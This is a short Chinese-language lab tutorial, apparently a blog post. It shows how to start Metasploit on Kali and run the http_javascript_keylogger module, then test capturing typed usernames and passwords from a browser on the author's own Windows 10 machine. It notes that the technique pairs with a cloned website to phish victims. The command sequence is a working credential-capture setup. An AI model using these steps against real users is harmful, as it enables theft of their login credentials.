(以下步骤配合克隆网站才算成功)
用户键盘输入被不法分子监控和记录的套路是怎么样子的?
准备工作
实验环境:kali2019 和win10(我自己的真机)
查看postgresql服务的状态:service postgresql status
若没有打开则输入:service postgresql start 临时开启服务
或者永久开启即:update -rc.d postgresql enable
服务打开后如下面所示
Kali:
进入msfconsole框架
键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上
search keylogger
使用search keylogger攻击模块:use auxiliary/server/capture/http_javascript_keylogger
show options查看要设置的内容
set demo true
set uipath /
run
生成local ip
本机:
将生成IP在浏览器登录(由于我还未克隆网站,所以简陋了一些)
随便输入用户名和密码看看能否监控
发现kali已经监控成功
